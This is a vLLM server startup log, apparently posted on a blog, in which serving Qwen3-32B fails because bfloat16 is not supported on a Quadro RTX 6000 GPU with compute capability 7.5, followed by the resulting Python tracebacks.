guided_decoding_backend='auto', reasoning_parser=None, logits_processor_pattern=None, model_impl='auto', distributed_executor_backend=None, pipeline_parallel_size=1, tensor_parallel_size=2, data_parallel_size=1, enable_expert_parallel=False, max_parallel_loading_workers=None, ray_workers_use_nsight=False, disable_custom_all_reduce=False, block_size=None, gpu_memory_utilization=0.8, swap_space=4, kv_cache_dtype='auto', num_gpu_blocks_override=None, enable_prefix_caching=True, prefix_caching_hash_algo='builtin', cpu_offload_gb=20.0, calculate_kv_scales=False, disable_sliding_window=False, use_v2_block_manager=True, seed=None, max_logprobs=20, disable_log_stats=False, quantization=None, rope_scaling=None, rope_theta=None, hf_token=None, hf_overrides=None, enforce_eager=False, max_seq_len_to_capture=8192, tokenizer_pool_size=0, tokenizer_pool_type='ray', tokenizer_pool_extra_config={}, limit_mm_per_prompt={}, mm_processor_kwargs=None, disable_mm_preprocessor_cache=False, enable_lora=None, enable_lora_bias=False, max_loras=1, max_lora_rank=16, lora_extra_vocab_size=256, lora_dtype='auto', long_lora_scaling_factors=None, max_cpu_loras=None, fully_sharded_loras=False, enable_prompt_adapter=None, max_prompt_adapters=1, max_prompt_adapter_token=0, device='auto', speculative_config=None, ignore_patterns=[], served_model_name=None, qlora_adapter_name_or_path=None, show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None, disable_async_output_proc=False, max_num_batched_tokens=None, max_num_seqs=None, max_num_partial_prefills=1, max_long_partial_prefills=1, long_prefill_token_threshold=0, num_lookahead_slots=0, scheduler_delay_factor=0.0, preemption_mode=None, num_scheduler_steps=1, multi_step_stream_outputs=True, scheduling_policy='fcfs', enable_chunked_prefill=None, disable_chunked_mm_input=False, scheduler_cls='vllm.core.scheduler.Scheduler', override_neuron_config=None, override_pooler_config=None, compilation_config=None, kv_transfer_config=None, worker_cls='auto', worker_extension_cls='', generation_config='auto', override_generation_config=None, enable_sleep_mode=False, additional_config=None, enable_reasoning=False, disable_cascade_attn=False, disable_log_requests=False, max_log_len=None, disable_fastapi_docs=False, enable_prompt_tokens_details=False, enable_server_load_tracking=False, dispatch_function=<function ServeSubcommand.cmd at 0x7f625a071bc0>) WARNING 05-10 20:06:36 [config.py:2972] Casting torch.float16 to torch.bfloat16. INFO 05-10 20:06:42 [config.py:717] This model supports multiple tasks: {'reward', 'embed', 'generate', 'classify', 'score'}. Defaulting to 'generate'. WARNING 05-10 20:06:42 [arg_utils.py:1658] Compute Capability < 8.0 is not supported by the V1 Engine. Falling back to V0. INFO 05-10 20:06:42 [config.py:1770] Defaulting to use mp for distributed inference INFO 05-10 20:06:42 [api_server.py:246] Started engine process with PID 73230 INFO 05-10 20:06:45 [__init__.py:239] Automatically detected platform cuda. INFO 05-10 20:06:47 [llm_engine.py:240] Initializing a V0 LLM engine (v0.8.5.post1) with config: model='/media/zhzx/ssd2/Qwen3-32B', speculative_config=None, tokenizer='/media/zhzx/ssd2/Qwen3-32B', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, override_neuron_config=None, tokenizer_revision=None, trust_remote_code=True, dtype=torch.bfloat16, max_seq_len=8126, download_dir=None, load_format=LoadFormat.AUTO, tensor_parallel_size=2, pipeline_parallel_size=1, disable_custom_all_reduce=False, quantization=None, enforce_eager=False, kv_cache_dtype=auto, device_config=cuda, decoding_config=DecodingConfig(guided_decoding_backend='auto', reasoning_backend=None), observability_config=ObservabilityConfig(show_hidden_metrics=False, otlp_traces_endpoint=None, collect_model_forward_time=False, collect_model_execute_time=False), seed=None, served_model_name=/media/zhzx/ssd2/Qwen3-32B, num_scheduler_steps=1, multi_step_stream_outputs=True, enable_prefix_caching=True, chunked_prefill_enabled=False, use_async_output_proc=True, disable_mm_preprocessor_cache=False, mm_processor_kwargs=None, pooler_config=None, compilation_config={"splitting_ops":[],"compile_sizes":[],"cudagraph_capture_sizes":[256,248,240,232,224,216,208,200,192,184,176,168,160,152,144,136,128,120,112,104,96,88,80,72,64,56,48,40,32,24,16,8,4,2,1],"max_capture_size":256}, use_cached_outputs=True, WARNING 05-10 20:06:48 [multiproc_worker_utils.py:306] Reducing Torch parallelism from 16 threads to 1 to avoid unnecessary CPU contention. Set OMP_NUM_THREADS in the external environment to tune this value as needed. INFO 05-10 20:06:48 [cuda.py:240] Cannot use FlashAttention-2 backend for Volta and Turing GPUs. INFO 05-10 20:06:48 [cuda.py:289] Using XFormers backend. INFO 05-10 20:06:50 [__init__.py:239] Automatically detected platform cuda. (VllmWorkerProcess pid=73270) INFO 05-10 20:06:53 [multiproc_worker_utils.py:225] Worker ready; awaiting tasks (VllmWorkerProcess pid=73270) INFO 05-10 20:06:53 [cuda.py:240] Cannot use FlashAttention-2 backend for Volta and Turing GPUs. (VllmWorkerProcess pid=73270) INFO 05-10 20:06:53 [cuda.py:289] Using XFormers backend. ERROR 05-10 20:06:53 [engine.py:448] Bfloat16 is only supported on GPUs with compute capability of at least 8.0. Your Quadro RTX 6000 GPU has compute capability 7.5. You can use float16 instead by explicitly setting the `dtype` flag in CLI, for example: --dtype=half. ERROR 05-10 20:06:53 [engine.py:448] Traceback (most recent call last): ERROR 05-10 20:06:53 [engine.py:448] File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/engine/multiprocessing/engine.py", line 436, in run_mp_engine ERROR 05-10 20:06:53 [engine.py:448] engine = MQLLMEngine.from_vllm_config( ERROR 05-10 20:06:53 [engine.py:448] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 05-10 20:06:53 [engine.py:448] File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/engine/multiprocessing/engine.py", line 128, in from_vllm_config ERROR 05-10 20:06:53 [engine.py:448] return cls( ERROR 05-10 20:06:53 [engine.py:448] ^^^^ ERROR 05-10 20:06:53 [engine.py:448] File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/engine/multiprocessing/engine.py", line 82, in __init__ ERROR 05-10 20:06:53 [engine.py:448] self.engine = LLMEngine(*args, **kwargs) ERROR 05-10 20:06:53 [engine.py:448] ^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 05-10 20:06:53 [engine.py:448] File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/engine/llm_engine.py", line 275, in __init__ ERROR 05-10 20:06:53 [engine.py:448] self.model_executor = executor_class(vllm_config=vllm_config) ERROR 05-10 20:06:53 [engine.py:448] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 05-10 20:06:53 [engine.py:448] File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/executor/executor_base.py", line 286, in __init__ ERROR 05-10 20:06:53 [engine.py:448] super().__init__(*args, **kwargs) ERROR 05-10 20:06:53 [engine.py:448] File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/executor/executor_base.py", line 52, in __init__ ERROR 05-10 20:06:53 [engine.py:448] self._init_executor() ERROR 05-10 20:06:53 [engine.py:448] File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/executor/mp_distributed_executor.py", line 124, in _init_executor ERROR 05-10 20:06:53 [engine.py:448] self._run_workers("init_device") ERROR 05-10 20:06:53 [engine.py:448] File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/executor/mp_distributed_executor.py", line 185, in _run_workers ERROR 05-10 20:06:53 [engine.py:448] driver_worker_output = run_method(self.driver_worker, sent_method, ERROR 05-10 20:06:53 [engine.py:448] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 05-10 20:06:53 [engine.py:448] File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/utils.py", line 2456, in run_method ERROR 05-10 20:06:53 [engine.py:448] return func(*args, **kwargs) ERROR 05-10 20:06:53 [engine.py:448] ^^^^^^^^^^^^^^^^^^^^^ ERROR 05-10 20:06:53 [engine.py:448] File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/worker/worker_base.py", line 604, in init_device ERROR 05-10 20:06:53 [engine.py:448] self.worker.init_device() # type: ignore ERROR 05-10 20:06:53 [engine.py:448] ^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 05-10 20:06:53 [engine.py:448] File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/worker/worker.py", line 177, in init_device ERROR 05-10 20:06:53 [engine.py:448] _check_if_gpu_supports_dtype(self.model_config.dtype) ERROR 05-10 20:06:53 [engine.py:448] File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/worker/worker.py", line 546, in _check_if_gpu_supports_dtype ERROR 05-10 20:06:53 [engine.py:448] raise ValueError( ERROR 05-10 20:06:53 [engine.py:448] ValueError: Bfloat16 is only supported on GPUs with compute capability of at least 8.0. Your Quadro RTX 6000 GPU has compute capability 7.5. You can use float16 instead by explicitly setting the `dtype` flag in CLI, for example: --dtype=half. Process SpawnProcess-1: ERROR 05-10 20:06:53 [multiproc_worker_utils.py:120] Worker VllmWorkerProcess pid 73270 died, exit code: -15 INFO 05-10 20:06:53 [multiproc_worker_utils.py:124] Killing local vLLM worker processes Traceback (most recent call last): File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/multiprocessing/process.py", line 314, in _bootstrap self.run() File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/multiprocessing/process.py", line 108, in run self._target(*self._args, **self._kwargs) File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/engine/multiprocessing/engine.py", line 450, in run_mp_engine raise e File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/engine/multiprocessing/engine.py", line 436, in run_mp_engine engine = MQLLMEngine.from_vllm_config( ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/engine/multiprocessing/engine.py", line 128, in from_vllm_config return cls( ^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/engine/multiprocessing/engine.py", line 82, in __init__ self.engine = LLMEngine(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/engine/llm_engine.py", line 275, in __init__ self.model_executor = executor_class(vllm_config=vllm_config) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/executor/executor_base.py", line 286, in __init__ super().__init__(*args, **kwargs) File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/executor/executor_base.py", line 52, in __init__ self._init_executor() File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/executor/mp_distributed_executor.py", line 124, in _init_executor self._run_workers("init_device") File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/executor/mp_distributed_executor.py", line 185, in _run_workers driver_worker_output = run_method(self.driver_worker, sent_method, ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/utils.py", line 2456, in run_method return func(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/worker/worker_base.py", line 604, in init_device self.worker.init_device() # type: ignore ^^^^^^^^^^^^^^^^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/worker/worker.py", line 177, in init_device _check_if_gpu_supports_dtype(self.model_config.dtype) File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/worker/worker.py", line 546, in _check_if_gpu_supports_dtype raise ValueError( ValueError: Bfloat16 is only supported on GPUs with compute capability of at least 8.0. Your Quadro RTX 6000 GPU has compute capability 7.5. You can use float16 instead by explicitly setting the `dtype` flag in CLI, for example: --dtype=half. Traceback (most recent call last): File "/home/zhzx/miniconda3/envs/vllm/bin/vllm", line 8, in <module> sys.exit(main()) ^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/entrypoints/cli/main.py", line 53, in main args.dispatch_function(args) File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/entrypoints/cli/serve.py", line 27, in cmd uvloop.run(run_server(args)) File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/uvloop/__init__.py", line 109, in run return __asyncio.run( ^^^^^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/asyncio/runners.py", line 195, in run return runner.run(main) ^^^^^^^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/asyncio/runners.py", line 118, in run return self._loop.run_until_complete(task) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "uvloop/loop.pyx", line 1518, in uvloop.loop.Loop.run_until_complete File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/uvloop/__init__.py", line 61, in wrapper return await main ^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/entrypoints/openai/api_server.py", line 1078, in run_server async with build_async_engine_client(args) as engine_client: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/contextlib.py", line 210, in __aenter__ return await anext(self.gen) ^^^^^^^^^^^^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/entrypoints/openai/api_server.py", line 146, in build_async_engine_client async with build_async_engine_client_from_engine_args( ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/contextlib.py", line 210, in __aenter__ return await anext(self.gen) ^^^^^^^^^^^^^^^^^^^^^ File "/home/zhzx/miniconda3/envs/vllm/lib/python3.12/site-packages/vllm/entrypoints/openai/api_server.py", line 269, in build_async_engine_client_from_engine_args raise RuntimeError( RuntimeError: Engine process failed to start. See stack trace for the root cause.
05-11
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值